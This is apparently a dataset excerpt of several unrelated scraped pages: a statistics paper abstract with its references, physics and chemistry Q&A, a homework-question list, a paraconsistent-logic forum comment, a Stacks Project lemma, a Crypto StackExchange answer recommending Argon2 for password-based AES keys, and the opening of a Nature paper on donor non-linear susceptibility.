text
stringlengths 9
294k
|
---|
## The Annals of Statistics
### Universally consistent vertex classification for latent positions graphs
#### Abstract
In this work we show that, using the eigen-decomposition of the adjacency matrix, we can consistently estimate feature maps for latent position graphs with positive definite link function $\kappa$, provided that the latent positions are i.i.d. from some distribution $F$. We then consider the exploitation task of vertex classification where the link function $\kappa$ belongs to the class of universal kernels and class labels are observed for a number of vertices tending to infinity and that the remaining vertices are to be classified. We show that minimization of the empirical $\varphi$-risk for some convex surrogate $\varphi$ of 0–1 loss over a class of linear classifiers with increasing complexities yields a universally consistent classifier, that is, a classification rule with error converging to Bayes optimal for any distribution $F$.
#### Article information
Source
Ann. Statist., Volume 41, Number 3 (2013), 1406-1430.
Dates
First available in Project Euclid: 1 August 2013
https://projecteuclid.org/euclid.aos/1375362554
Digital Object Identifier
doi:10.1214/13-AOS1112
Mathematical Reviews number (MathSciNet)
MR3113816
Zentralblatt MATH identifier
1273.62147
#### Citation
Tang, Minh; Sussman, Daniel L.; Priebe, Carey E. Universally consistent vertex classification for latent positions graphs. Ann. Statist. 41 (2013), no. 3, 1406--1430. doi:10.1214/13-AOS1112. https://projecteuclid.org/euclid.aos/1375362554
#### References
• [1] Airoldi, E. M., Blei, D. M., Fienberg, S. E. and Xing, E. P. (2008). Mixed membership stochastic blockmodels. J. Mach. Learn. Res. 9 1981–2014.
• [2] Bartlett, P. L., Jordan, M. I. and McAuliffe, J. D. (2006). Convexity, classification, and risk bounds. J. Amer. Statist. Assoc. 101 138–156.
• [3] Belkin, M. and Niyogi, P. (2005). Towards a theoretical foundation for Laplacian-based manifold methods. In Proceedings of the 18th Conference on Learning Theory (COLT 2005) 486–500. Springer, Berlin.
• [4] Bengio, Y., Vincent, P., Paiement, J. F., Delalleau, O., Ouimet, M. and Roux, N. L. (2004). Learning eigenfunctions links spectral embedding and kernel PCA. Neural Comput. 16 2197–2219.
• [5] Biau, G., Bunea, F. and Wegkamp, M. H. (2005). Functional classification in Hilbert spaces. IEEE Trans. Inform. Theory 51 2163–2172.
• [6] Blanchard, G., Bousquet, O. and Massart, P. (2008). Statistical performance of support vector machines. Ann. Statist. 36 489–531.
• [7] Blanchard, G., Bousquet, O. and Zwald, L. (2007). Statistical properties of kernel principal component analysis. Machine Learning 66 259–294.
• [8] Bollobás, B., Janson, S. and Riordan, O. (2007). The phase transition in inhomogeneous random graphs. Random Structures Algorithms 31 3–122.
• [9] Braun, M. L. (2006). Accurate error bounds for the eigenvalues of the kernel matrix. J. Mach. Learn. Res. 7 2303–2328.
• [10] Chatterjee, S. (2012). Matrix estimation by universal singular value thresholding. Preprint. Available at http://arxiv.org/abs/1212.1247.
• [11] Chaudhuri, K., Chung, F. and Tsiatas, A. (2012). Spectral partitioning of graphs with general degrees and the extended planted partition model. In Proceedings of the 25th Conference on Learning Theory. Springer, Berlin.
• [12] Cucker, F. and Smale, S. (2002). On the mathematical foundations of learning. Bull. Amer. Math. Soc. (N.S.) 39 1–49 (electronic).
• [13] Davis, C. and Kahan, W. M. (1970). The rotation of eigenvectors by a perturbation. III. SIAM J. Numer. Anal. 7 1–46.
• [14] Devroye, L., Györfi, L. and Lugosi, G. (1996). A Probabilistic Theory of Pattern Recognition. Applications of Mathematics (New York) 31. Springer, New York.
• [15] Diaconis, P. and Janson, S. (2008). Graph limits and exchangeable random graphs. Rend. Mat. Appl. (7) 28 33–61.
• [16] Fishkind, D. E., Sussman, D. L., Tang, M., Vogelstein, J. T. and Priebe, C. E. (2013). Consistent adjacency-spectral partitioning for the stochastic block model when the model parameters are unknown. SIAM J. Matrix Anal. Appl. 34 23–39.
• [17] Hein, M., Audibert, J.-Y. and von Luxburg, U. (2005). From graphs to manifolds—Weak and strong pointwise consistency of graph Laplacians. In Proceedings of the 18th Conference on Learning Theory (COLT 2005) 470–485. Springer, Berlin.
• [18] Hein, M., Audibert, J. Y. and von Luxburg, U. (2007). Convergence of graph Laplacians on random neighbourhood graphs. J. Mach. Learn. Res. 8 1325–1370.
• [19] Hoff, P. D., Raftery, A. E. and Handcock, M. S. (2002). Latent space approaches to social network analysis. J. Amer. Statist. Assoc. 97 1090–1098.
• [20] Holland, P. W., Laskey, K. B. and Leinhardt, S. (1983). Stochastic blockmodels: First steps. Social Networks 5 109–137.
• [21] Karrer, B. and Newman, M. E. J. (2011). Stochastic blockmodels and community structure in networks. Phys. Rev. E (3) 83 016107, 10.
• [22] Kato, T. (1987). Variation of discrete spectra. Comm. Math. Phys. 111 501–504.
• [23] Koltchinskii, V. and Giné, E. (2000). Random matrix approximation of spectra of integral operators. Bernoulli 6 113–167.
• [24] Lugosi, G. and Vayatis, N. (2004). On the Bayes-risk consistency of regularized boosting methods. Ann. Statist. 32 30–55.
• [25] Micchelli, C. A., Xu, Y. and Zhang, H. (2006). Universal kernels. J. Mach. Learn. Res. 7 2651–2667.
• [26] Oliveira, R. I. (2010). Concentration of the adjacency matrix and of the Laplacian in random graphs with independent edges. Preprint. Available at http://arxiv.org/abs/0911.0600.
• [27] Rohe, K., Chatterjee, S. and Yu, B. (2011). Spectral clustering and the high-dimensional stochastic blockmodel. Ann. Statist. 39 1878–1915.
• [28] Rosasco, L., Belkin, M. and De Vito, E. (2010). On learning with integral operators. J. Mach. Learn. Res. 11 905–934.
• [29] Shawe-Taylor, J., Williams, C. K. I., Cristianini, N. and Kandola, J. (2005). On the eigenspectrum of the Gram matrix and the generalization error of kernel-PCA. IEEE Trans. Inform. Theory 51 2510–2522.
• [30] Sriperumbudur, B. K., Fukumizu, K. and Lanckriet, G. R. G. (2011). Universality, characteristic kernels and RKHS embedding of measures. J. Mach. Learn. Res. 12 2389–2410.
• [31] Steinwart, I. (2002). On the influence of the kernel on the consistency of support vector machines. J. Mach. Learn. Res. 2 67–93.
• [32] Steinwart, I. (2002). Support vector machines are universally consistent. J. Complexity 18 768–791.
• [33] Steinwart, I. and Scovel, C. (2012). Mercer’s theorem on general domains: On the interaction between measures, kernels, and RKHSs. Constr. Approx. 35 363–417.
• [34] Stone, C. J. (1977). Consistent nonparametric regression. Ann. Statist. 5 595–620.
• [35] Sussman, D. L., Tang, M., Fishkind, D. E. and Priebe, C. E. (2012). A consistent adjacency spectral embedding for stochastic blockmodel graphs. J. Amer. Statist. Assoc. 107 1119–1128.
• [36] Sussman, D. L., Tang, M. and Priebe, C. E. (2012). Consistent latent position estimation and vertex classification for random dot product graphs. Preprint. Available at http://arxiv.org/abs/1207.6745.
• [37] Tropp, J. A. (2011). Freedman’s inequality for matrix martingales. Electron. Commun. Probab. 16 262–270.
• [38] von Luxburg, U., Belkin, M. and Bousquet, O. (2008). Consistency of spectral clustering. Ann. Statist. 36 555–586.
• [39] Young, S. J. and Scheinerman, E. R. (2007). Random dot product graph models for social networks. In Algorithms and Models for the Web-Graph. Lecture Notes in Computer Science 4863 138–149. Springer, Berlin.
• [40] Zhang, T. (2004). Statistical behavior and consistency of classification methods based on convex risk minimization. Ann. Statist. 32 56–85.
• [41] Zwald, L. and Blanchard, G. (2006). On the convergence of eigenspaces in kernel principal components analysis. In Advances in Neural Information Processing Systems (NIPS 05) 18 1649–1656. MIT Press, Cambridge. |
# Matrix elements of non-normalizable states
Tags:
1. Jan 13, 2016
### taishizhiqiu
Although strictly quantum mechanics is defined in $L_2$ (square integrable function space), non normalizable states exists in literature.
In this case, textbooks adopt an alternative normalization condition. for example, for $\psi_p(x)=\frac{1}{2\pi\hbar}e^{ipx/\hbar}$
$\langle\psi_p|\psi_{p'}\rangle=\delta(p-p')$
However, it is not easy calculating matrix elements this way. For example, how to calculate
$A(k)=i\langle u(k)|\partial_k|u(k)\rangle$
$A(k)$ is actually berry connection in solid state band theory and $u(k)$ is periodic part of bloch wave function.
Can anyone tell me how to define this matrix elements?
Last edited: Jan 13, 2016
2. Jan 13, 2016
### vanhees71
I do not understand your notation, defining $A(k)$. It simply doesn't make any sense to me. Where does this come from?
3. Jan 13, 2016
### taishizhiqiu
According to bloch theorem, wave function in crystals should be like $\psi_k(x)=e^{ikx}u_k(x)$, where $u_k(x+a)=u_k(x)$ and $a$ is lattice constant.
So $\langle u(k)|\partial_k|u(k)\rangle$ should be something like $\int u^*_k(x)\partial_k u_k(x)dx$, although it doesn't make sense because this integral is infinite.
$A$ is berry connection where the adiabatic parameter is $k$.(https://en.wikipedia.org/wiki/Berry_connection_and_curvature)This quantity is heavily used in topological insulators |
How to make a thing math problem up
Question:
How to make a thing math problem up
Ephemeral art can be defined as... a Art that is not permanent b an oil painting c art that is in a museum d art that is portable
Ephemeral art can be defined as... a Art that is not permanent b an oil painting c art that is in a museum d art that is portable...
Why did the second Continental Congress not want a strong central government?
why did the second Continental Congress not want a strong central government?...
What action did the United States take after World War I?
What action did the United States take after World War I?...
Find the following sums 4 + 7 + 10 + 13 + ... +40 + 43
Find the following sums 4 + 7 + 10 + 13 + ... +40 + 43...
The following question refers to a hypothetical situation. You are a member of your county's board of supervisors. At a public meeting of the board of supervisors, one county resident gets up and shouts at you for raising the state sales tax. After he is finished, you calm the man down and explain to him that you are not responsible for raising the state sales tax and that if he has a problem with the move he should address it with his district representative. He responds with, "Well, do you con
The following question refers to a hypothetical situation. You are a member of your county's board of supervisors. At a public meeting of the board of supervisors, one county resident gets up and shouts at you for raising the state sales tax. After he is finished, you calm the man down and explain t...
Yugoslavia broke up into a nunber of small countries after the communist control ended in the late 1980's because of ____?A) Pressure from Western European nationsB) Tensions between different ethnic groupsC) The lack of a common currencyD) The desite of some republics to remain Communist
Yugoslavia broke up into a nunber of small countries after the communist control ended in the late 1980's because of ____?A) Pressure from Western European nationsB) Tensions between different ethnic groupsC) The lack of a common currencyD) The desite of some republics to remain Communist...
A ladder that is 30 feet long is placed against a house. The location of the ladder is 8 feet from the base of the house. How far up the house does the ladder reach? Round your answer to the nearest tenth of a foot
A ladder that is 30 feet long is placed against a house. The location of the ladder is 8 feet from the base of the house. How far up the house does the ladder reach? Round your answer to the nearest tenth of a foot...
Choose the correct article and adjective for the following word: children the, nice, Nice, the, he, the, Nice, Sympathetic
Choose the correct article and adjective for the following word: children the, nice, Nice, the, he, the, Nice, Sympathetic...
By , cos(θ) = StartFraction x Over r EndFraction, and by , sin(θ) = StartFraction y Over r EndFraction. Multiplying both sides of the above equations by r, we get that x = r cos(θ) and y = r sin(θ). The states that x2 + y2 = r2. By , we have [r cos(θ)]2 + [r sin(θ)]2 = r2. Applying the , the equation can be written as r2 cos2(θ) + r2 sin2(θ) = r2. Dividing both sides of the equation by r2 results in cos2(θ) + sin2(θ) = 1.
By , cos(θ) = StartFraction x Over r EndFraction, and by , sin(θ) = StartFraction y Over r EndFraction. Multiplying both sides of the above equations by r, we get that x = r cos(θ) and y = r sin(θ). The states that x2 + y2 = r2. By , we have [r cos(θ)]2 + [r sin(θ)]2 = r2. Applying t...
In long division what is 28÷6691
In long division what is 28÷6691...
When inhaled, crystalline silica can cause scar tissue to form on what organs?
When inhaled, crystalline silica can cause scar tissue to form on what organs?...
What are the two major political parties in the us? How are they different?
What are the two major political parties in the us? How are they different?...
British statesman and proponent of British imperialism. Challenged the British people to create an empire by stating that it was their duty and a great honor and their divinely ordered mission of their country. Question 2 options: Benjamin Disraeli Dr. David Livingston Ferdinand de Lessups
British statesman and proponent of British imperialism. Challenged the British people to create an empire by stating that it was their duty and a great honor and their divinely ordered mission of their country. Question 2 options: Benjamin Disraeli Dr. David Livingston Ferdinand de Lessups...
The shoot system of a beavertail cactus consists of broad paddle-like structures covered with clusters of spines. The spines are modified leaves, so the flat green paddles must be modified _____. (Concept 35.1) roots stems leaves buds None of the listed responses is correct.
The shoot system of a beavertail cactus consists of broad paddle-like structures covered with clusters of spines. The spines are modified leaves, so the flat green paddles must be modified _____. (Concept 35.1) roots stems leaves buds None of the listed responses is correct....
Help pls I really need it?
Help pls I really need it?...
What additional information would you need to prove the triangles congruent by ASA?
What additional information would you need to prove the triangles congruent by ASA?...
Can someone please give me a short chapter 2 summary of The Outsiders please??:)
can someone please give me a short chapter 2 summary of The Outsiders please??:)...
Rawls thinks that people are justified in owning the objects and wealth that they do when:
Rawls thinks that people are justified in owning the objects and wealth that they do when:...
Suppose the price of apples increases from $20 to$27, and in response quantity demanded decreases from 108 to 98. Using the mid-point formula, what is the price elasticity of demand
Suppose the price of apples increases from $20 to$27, and in response quantity demanded decreases from 108 to 98. Using the mid-point formula, what is the price elasticity of demand... |
by Kaya Stechly 1562 days ago | link | parent | on: Paraconsistent Tiling Agents (Very Early Draft) Section 4.1 is fairly unpolished. I’m still looking for better ways of handling the problems it brings up; solutions 4.1 and 4.2 are very preliminary stabs in that direction. The action condition you mention might work. I don’t think it would re-introduce Löbian or similar difficulties, as it merely requires that $$\overline{a}$$ implies that $$G$$ is only true, which is a truth value found in $$LP$$. Furthermore, we still have our internally provable T-schema, which does not depend on the action condition, from which we can derive that if the child can prove $$(\overline{a}\rightarrow G)\land\lnot(\overline{a}\rightarrow\lnot G)$$, then so can the parent. It is important to note that “most” (almost everything we are interested in) of $$\mathcal{PA}\star$$ is consistent without problem. Now that I think about it, your action condition should be a requirement for paraconsistent agents, as otherwise they will be willing to do things that they can prove will not accomplish $$\mathcal{G}$$. There may yet be a situation which breaks this, but I have not come across it. reply
by Kaya Stechly 1567 days ago | Jessica Taylor likes this | link | parent | on: Paraconsistent Tiling Agents (Very Early Draft) 1. Any extension of $$LP$$ will work as well unless it leads to triviality; however, we cannot in general validate the $$T$$-schema for an arbitrary conditional. For example, any conditional $$\rightarrow$$ that satisfies the inference of contraction ($$\alpha\rightarrow(\alpha\rightarrow\beta)\Vdash\alpha\rightarrow\beta$$) will succumb to Curry’s paradox and lead to triviality (consider the fixed point formula $$\gamma$$ of the form $$T(\gamma)\rightarrow\perp$$). Now, as far as I can tell, we can validate the T-schema of the conditional for $$RM_3$$; since $$LP\supset$$’s conditional is expressively equivalent, it seems like it shouldn’t be too hard to show that we can also validate its T-schema. For further discussion on the topic (with proofs, etc.), see chapter 8 of Priest’s part of volume XI of the second edition of Gabbay and Geunther’s Handbook of Philosophical Logic (what a mouthful of of’s). A thorough presentation of $$LP$$ can be found in Priest’s An Introduction to Non-Classical Logics, section 7.4. Sections 7.1-7.3 introduce the general structures of such logics and delineate their differences. This book does not say much about truth schemas. Priest’s paper “The Logic of Paradox” from ’79 also describes $$LP$$, although I find the presentation a bit clunky. For a better grasp of how inference works in $$LP$$, look at section III.9; there are examples of both inferences that are true and inferences that do not always hold even though we ay expect them to. I will probably be writing up a minimal formal description soon, as I code the PROLOG meta-interpreter. We can prove non-triviality of $$LP$$ and that the T-schema holds, so as a consequence L"ob must fail. This seems somewhat unsatisfactory as an answer to which step fails. I can think of a few reasons why L"ob might fail; I haven’t seen a discussion of this in the literature, so I will try to cobble together an answer or the shape thereof from what I know. One possible reason is that pseudo Modus Ponens fails in LP. That is, though $$A,A\rightarrow B$$ might entail $$B$$ for a well chosen conditional, $$A\wedge (A\rightarrow B)\rightarrow B$$ must fail or else lead to triviality due to Curry’s paradox. More likely is that this is a consequence of the way paraconsistency works with modal logic. From the wikipedia article you linked, we have that “in normal modal logic, Löb’s axiom is equivalent to the conjunction of the axiom schema 4, ($$\Box\Box A\rightarrow\Box A$$) and the existence of modal fixed points.” We have both of those, so the difference must stem from the phrase “normal modal logics.” The proof uses the fact of the existence of a modal fixed point of a certain form; this may not hold in a modal extension of $$LP$$ (which would be analogous to $$KM_3$$, the modal extension of $$RM_3$$, just as $$K$$ is the modal extension of classical logic.). More details on modal extensions of paraconsistent logics can be found in McGinnis’ paper “Tableau Systems for Some Paraconsistent Modal Logics,” though this paper does not mention modal fixed points. In fact, none of the papers I’ve read so far on paraconsistent modal logics have mentioned fixed points. I would construct a proof on my own, but I am currently too unfamiliar with modal logic; if it is important, I can go learn enough and do it. Thanks for your comments! I hope to have at least somewhat answered your questions. Paraconsistency is still to me a very strange subject, so my studies and understanding are still very much incomplete. reply
### NEW DISCUSSION POSTS
[Note: This comment is three
by Ryan Carey on A brief note on factoring out certain variables | 0 likes
There should be a chat icon
by Alex Mennen on Meta: IAFF vs LessWrong | 0 likes
Apparently "You must be
by Jessica Taylor on Meta: IAFF vs LessWrong | 1 like
There is a replacement for
by Alex Mennen on Meta: IAFF vs LessWrong | 1 like
Regarding the physical
by Vanessa Kosoy on The Learning-Theoretic AI Alignment Research Agend... | 0 likes
I think that we should expect
by Vanessa Kosoy on The Learning-Theoretic AI Alignment Research Agend... | 0 likes
I think I understand your
by Jessica Taylor on The Learning-Theoretic AI Alignment Research Agend... | 0 likes
This seems like a hack. The
by Jessica Taylor on The Learning-Theoretic AI Alignment Research Agend... | 0 likes
After thinking some more,
by Vanessa Kosoy on The Learning-Theoretic AI Alignment Research Agend... | 0 likes
Yes, I think that we're
by Vanessa Kosoy on The Learning-Theoretic AI Alignment Research Agend... | 0 likes
My intuition is that it must
by Vanessa Kosoy on The Learning-Theoretic AI Alignment Research Agend... | 0 likes
To first approximation, a
by Vanessa Kosoy on The Learning-Theoretic AI Alignment Research Agend... | 0 likes
Actually, I *am* including
by Vanessa Kosoy on The Learning-Theoretic AI Alignment Research Agend... | 0 likes
Yeah, when I went back and
by Alex Appel on Optimal and Causal Counterfactual Worlds | 0 likes
> Well, we could give up on
by Jessica Taylor on The Learning-Theoretic AI Alignment Research Agend... | 0 likes |
Lemma 76.12.5. In Situation 76.12.1 let $K$ be as in Lemma 76.12.2. For any étale morphism $U \to X$ with $U$ quasi-compact and quasi-separated we have
$R\Gamma (U, K) \otimes _ A^\mathbf {L} A_ n = R\Gamma (U_ n, \mathcal{F}_ n)$
in $D(A_ n)$ where $U_ n = U \times _ X X_ n$.
Proof. Fix $n$. By Derived Categories of Spaces, Lemma 74.27.3 there exists a system of perfect complexes $E_ m$ on $X$ such that $R\Gamma (U, K) = \text{hocolim} R\Gamma (X, K \otimes ^\mathbf {L} E_ m)$. In fact, this formula holds not just for $K$ but for every object of $D_\mathit{QCoh}(\mathcal{O}_ X)$. Applying this to $\mathcal{F}_ n$ we obtain
\begin{align*} R\Gamma (U_ n, \mathcal{F}_ n) & = R\Gamma (U, \mathcal{F}_ n) \\ & = \text{hocolim}_ m R\Gamma (X, \mathcal{F}_ n \otimes ^\mathbf {L} E_ m) \\ & = \text{hocolim}_ m R\Gamma (X_ n, \mathcal{F}_ n \otimes ^\mathbf {L} E_ m|_{X_ n}) \end{align*}
Using Lemma 76.12.3 and the fact that $- \otimes _ A^\mathbf {L} A_ n$ commutes with homotopy colimits we obtain the result. $\square$
In your comment you can use Markdown and LaTeX style mathematics (enclose it like $\pi$). A preview option is available if you wish to see how it works out (just click on the eye in the toolbar). |
# How does energy evolve in the INCOMPLETE combustion of benzene...?
Nov 19, 2016
You might have to qualify your question here.
#### Explanation:
I can easily write a stoichiometric equation for the incomplete combustion of benzene:
${C}_{6} {H}_{6} \left(l\right) + 6 {O}_{2} \left(g\right) \rightarrow 4 C {O}_{2} \left(g\right) + C O \left(g\right) + C \left(s\right) + 3 {H}_{2} O \left(l\right)$
Is this balanced? Don't trust my arithmetic.
Of course, I don't know that this precise stoichiometry will occur, but given thermodynamic parameters (which you have ommitted!), we could work out the enthalpy change of the reaction.
The complete combustion of benzene occurs according to the stoichiometry...
${C}_{6} {H}_{6} \left(l\right) + \frac{15}{2} {O}_{2} \left(g\right) \rightarrow 6 C {O}_{2} \left(g\right) + 3 {H}_{2} O \left(l\right)$
And we would expect the thermal output of this reaction to be greater than that of the former. Why so? |
MathSciNet bibliographic data MR418168 (54 #6210) 58F20 Mayer, Dieter H. On a $\zeta$$\zeta$ function related to the continued fraction transformation. Bull. Soc. Math. France 104 (1976), no. 2, 195–203. Article
For users without a MathSciNet license , Relay Station allows linking from MR numbers in online mathematical literature directly to electronic journals and original articles. Subscribers receive the added value of full MathSciNet reviews. |
# AES: Why is it a good practice to use only the first 16 bytes of a hash for encryption?
I'd like to encrypt Text with AES/CTR and a password defined by the user in java. I already checked the internet (and stackoverflow) for answers. The most used version is to hash the user password with sha1 and take only the first 16 bytes.
But I don't think this can be a good practice.
1. sha1 is weak
2. taking only the first 16 bytes makes the hash also weak and rise the chance for a collision (even with sha-256)
Is this really the best practice? Why? How can I do things better?
Some links to the articles I mentioned:
• They are not good sources. Anyway I will call this question as dupe of this and this – kelalaka Apr 4 at 18:28
• Nowadays you should probably use HKDF with an appropriate hash. – jww Apr 5 at 2:42
• Collision is irrelevant. The chance of 128-bit hash (thus key) collision for different passwords is very low unless you have at least thousands of times more users than exist on Earth (about 2^44) and anyway there's no harm as long as you do not also reuse the same nonce for different data. If the (96-bit) nonce is indepedently random that chance is infinitesimal; if the nonce is systematic (e.g. counter) or synthetic (SIV) there is zero chance. The real and serious danger is using a fast hash on password input, as correctly answered by Ella. – dave_thompson_085 Apr 5 at 15:50
Why is it a good practice to use only the first 16 bytes of a hash for encryption?
As you noted, it isn't.
But, the problem is not with the "16 bytes" part of the statement, or the concern for collisions. The problem is with the "hash" part.
## 16 bytes
As stated in one of the links you shared, AES only uses key sizes of 128, 192, and 256 bits (or 16, 24, and 32 bytes, respectively). So the key must be one of these sizes, because AES simply does not support other key sizes.
Trying to use a larger key could have a variety of possible outcomes depending on what the implementation chooses to do. It might raise an exception, or continue silently while only using the first N bits of the supplied key.
## Hashing a password to use as an encryption key
Using a hash function such as MD5, SHA1, SHA2, SHA3, blake2, etc, would all be bad practice. The first two are obvious: MD5 and SHA1 are known to be weak in general.
But even using a strong cryptographic hash like SHA3 or blake2 would also be bad, because they were not designed to solve the problem of deriving a key from a password. Use of a cryptographic hash function is involved in this process, but it is not the entirety of it.
Good practice would be to use a dedicated key derivation function such as Argon2 that was designed to solve this problem. If your library doesn't support Argon2 but supports scrypt, bcrypt or PBKDF2, any of these three is also a reasonable choice.
## Why/How
A normal hash function is designed to be fast and require little space.
A hash function designed for use on passwords is quite the opposite: it is a slow function that requires lots of memory access, in an attempt to try and optimize the function towards what a consumer CPU is good at, and minimize the potential for optimization with special hardware. Specialized hardware is usable by an attacker, but a legitimate user is limited to a commodity CPU; The goal is to try and use a function that cannot take advantage of special hardware to the extent possible.
Details about the hows and whys of password hashing are listed in this paper and quoted below (with minor modifications, e.g. removing citations and modified formatting):
Cryptographic Security: The scheme should be cryptographically secure and as such possess the following properties:
• 1) Preimage resistance
• 2) Second preimage resistance
• 3) collision resistance.
In addition it should avoid other cryptographic weaknesses such as those present in (some)Merkle-Damgård constructions(e.g. length extension attacks, partial message collisions, etc)
Defense against lookup table /TMTOAttacks:
• The scheme should aim to make TMTO attacks that allow for precomputed lookup table generation, such as Rainbow Tables, infeasible
Defense against CPU-optimized 'crackers':
• The scheme should be ‘CPU-hard’, that is, it should require significant amounts of CPU processing in a manner that cannot be optimized away through either software or hardware. As such, cracking-optimized (multi-core) CPU software implementations (eg. written in assembly, testing multiple input sets in parallel) should offer only minimal speed-up improvements compared to those intended for validation (“slower for attackers, faster for defenders”).
Defense against hardware-optimized 'crackers':
• The scheme should be 'memory-hard', that is, it should significant amounts of RAM capacity in a manner that cannot be optimized away through eg. TMTO attacks. As such cracking-optimized ASIC, FPGA and GPU implementations should offer only minimal speed up improvements (eg. in terms of time-area product) compared to those intended for validation. As noted by Aumasson one of the main scheme design challenges is ensuring minimized efficiency on GPUs, FPGAs and ASICs (in order to minimize benefits of cracking-optimized implementations) and maximized efficiency on general-purpose CPUs (in order to maintain regular use efficiency).
Defense against side-channel attacks:
• Depending on the use-case (eg. for key derivation or authentication to a device seeking to protect against modification by the device owner) side-channel attacks might be a relevant avenue of attack. Password hashing schemes should aim to offer side-channel resilience. With regards to password hashing scheme security we will focus on security versus the cache-timing type of side-channel attacks given the existence of such attacks against the commonly used scrypt scheme. The second category of side-channel attacks we will take into consideration are so-called Garbage Collector Attacks (GCAs). GCAs have been discussed in literature as an instance of a 'memory leak' attack relevant to password hashing scheme security. GCAs consist of a scenario where an attacker has access to a target machine's internal memory either after termination of the hashing scheme or at some point where the password itself is still present in memory (the so-called WeakGCA variant)...
• Nitpick: bcrypt is advertised as a password storage and verification function, not so much a key derivation function, and implementations routinely have APIs to match that (e.g., outputting text encoded output, providing an enroll/verify API instead of a hash API, That is not to claim that bcrypt couldn't be used as you suggest, but there are potential practical pitfalls. See, e.g., this article. – Luis Casillas Apr 4 at 22:00
• @LuisCasillas just a note: I actually didn't list bcrypt; that was inserted to my answer by Gilles via an edit... – Ella Rose Apr 4 at 22:35
• @LuisCasillas Argon2 was also the winner of the password hashing competition, not the password-based KDF competition. Is there any reason to believe that Argon2 is good for PBKDF that doesn't also apply to bcrypt? – Gilles Apr 4 at 23:46
• @Gilles The PHC call for submissions had a requirement that the outputs look random, which to my mind implies such suitability. But really, the biggest pitfalls I'm thinking of here aren't conceptually deep; they come down to bcrypt implementations doing stuff like producing ASCII output like "$2a$" + cost + "\$" + base64(salt + hash). At the level of (un)sophistication we're dealing with in this question I worry somebody might literally use the ASCII string's bytes. – Luis Casillas Apr 5 at 9:46
• @firendlyQuestion: Yes, provided you use an Argon2 implementation or API that produces binary output. The tricky detail here is that some implementations of such functions are coded to be friendly to callers who are using them for password storage instead of key derivation. – Luis Casillas Apr 5 at 9:48 |
Thank you for visiting nature.com. You are using a browser version with limited support for CSS. To obtain the best experience, we recommend you use a more up to date browser (or turn off compatibility mode in Internet Explorer). In the meantime, to ensure continued support, we are displaying the site without styles and JavaScript.
# Giant non-linear susceptibility of hydrogenic donors in silicon and germanium
## Abstract
Implicit summation is a technique for the conversion of sums over intermediate states in multiphoton absorption and the high-order susceptibility in hydrogen into simple integrals. Here, we derive the equivalent technique for hydrogenic impurities in multi-valley semiconductors. While the absorption has useful applications, it is primarily a loss process; conversely, the non-linear susceptibility is a crucial parameter for active photonic devices. For Si:P, we predict the hyperpolarizability ranges from χ(3)/n3D = 2.9 to 580 × 10−38 m5/V2 depending on the frequency, even while avoiding resonance. Using samples of a reasonable density, n3D, and thickness, L, to produce third-harmonic generation at 9 THz, a frequency that is difficult to produce with existing solid-state sources, we predict that χ(3) should exceed that of bulk InSb and χ(3)L should exceed that of graphene and resonantly enhanced quantum wells.
## Introduction
Multiphoton absorption requires a high intensity, and was first observed shortly after the invention of the laser using impurities in solids1 and alkali vapor2. Although multiphoton absorption is useful for metrology and modulators, and can be enhanced where there is near-resonance of an intermediate state as in the case of Rb3, it is essentially a loss process contributing an imaginary part to the non-linear susceptibility. The corresponding real part is responsible for a great variety of wavelength conversion processes such as harmonic generation, first observed in quartz4 and later in atomic vapors5 including alkalies6. THz multiphoton absorption has been shown to be very large in hydrogenic shallow impurities in semiconductors, even without intermediate state resonances7, due to the large dielectric screening and low effective mass. Here, we predict giant values for the real part of the THz non-linear susceptibility for doped silicon and germanium. This finding opens access to novel applications for these materials in THz photonics. For example, tripling the output of a 2–4 THz quantum cascade laser through third-harmonic generation would fill the frequency gap currently only filled by larger, more expensive systems. We show that a good efficiency can be obtained for third-harmonic generation with doped silicon and germanium. Our theory can be readily applied to any donor in any semiconductor host where the effective mass approximation is valid, and our discussion makes it clear that a giant value of χ(3) is expected for donors with a small binding energy in a host with a large dielectric constant and small effective mass.
The theory developed in this paper is appropriate for frequencies both near to and far from loss-inducing resonances, including the effects of effective mass anisotropy, multi-valley interactions and the central cell correction. The method could easily be applied to other systems with complicated potentials, such as multi-quantum wells. Although this work focuses on perturbative harmonic generation, we anticipate that shallow impurities may also be useful for non-perturbative high-harmonic generation (HHG)8,9 taking advantage of the excellent control over the carrier-envelope phase of few-cycle pulses in this THz regime, which can be used to enhance HHG10.
## Results
### The implicit summation technique
From Nth-order perturbation theory7,11 the N-photon absorption (NPA) transition rate may be written as
$$w^{(N)} = 2\pi \frac{{\left( {2\pi \alpha _{fs}} \right)^N}}{N}\left| {M^{(N)}} \right|^2\left[ {\frac{{E_H^2}}{{\varepsilon _r^{N/2}I_a^N}}} \right]\frac{{I_m^N{\mathrm{\Gamma }}^{(N)}}}{{\hbar ^2}}$$
(1)
where $$I_a = E_H^2/\hbar a_B^2$$, aB is the Bohr radius, EH the Hartree energy, and αfs the fine structure constant. M(N) is a dimensionless transition matrix element, and Im is the intensity of the light in the medium with relative dielectric permittivity εr. The lineshape function Γ(N)(ω) has unit area. For silicon and germanium donors, the factors inside the bracket are renormalized, and of particular importance here Ia is ten orders of magnitude smaller for silicon than it is for hydrogen. This is apparent from the formulae of the Hartree energy and Bohr radius for donors in these materials: $$E_H = m_t(e^2/4\pi \epsilon _0\varepsilon_r \hbar )^2$$, and $$a_B = 4\pi \epsilon _0\varepsilon_r \hbar ^2/m_te^2$$, where mt is the transverse effective mass and $$\varepsilon_r$$ the dielectric constant12. Both germanium and silicon have a small mt and large $$\varepsilon_r$$, raising the Bohr radius and lowering the binding energy. The wavefunction is therefore significantly larger than that of alkali atoms, leading to an enhanced dipole matrix element and hence a substantially stronger interaction with light.
The details of the spectrum given by Eq. (1) are controlled by M(N), which is influenced in silicon by the indirect valley structure, the anisotropic effective mass, and the donor central cell correction potential. Our main aim here is to calculate these effects. For single-photon absorption (N = 1) between states |ψg〉 (the ground state) and |ψe〉 (the excited state), $$M^{(1)} = \left\langle {\psi _e\left| {{\boldsymbol{\epsilon }}.{\boldsymbol{r}}} \right|\psi _g} \right\rangle /a_B$$, where $${\bf{\epsilon }}$$ is a unit vector in the polarization direction, and Eq. (1) reduces to Fermi’s golden rule. For two-photon absorption,
$$M^{(2)} = \frac{{E_H}}{{\hbar a_B^2}}\mathop {\sum}\limits_j {\frac{{\left\langle {\psi _e\left| {{\boldsymbol{\epsilon }}.{\boldsymbol{r}}} \right|j} \right\rangle \left\langle {j\left| {{\boldsymbol{\epsilon }}.{\boldsymbol{r}}} \right|\psi _g} \right\rangle }}{{\omega _{jg} - \omega _{eg}/2}}}$$
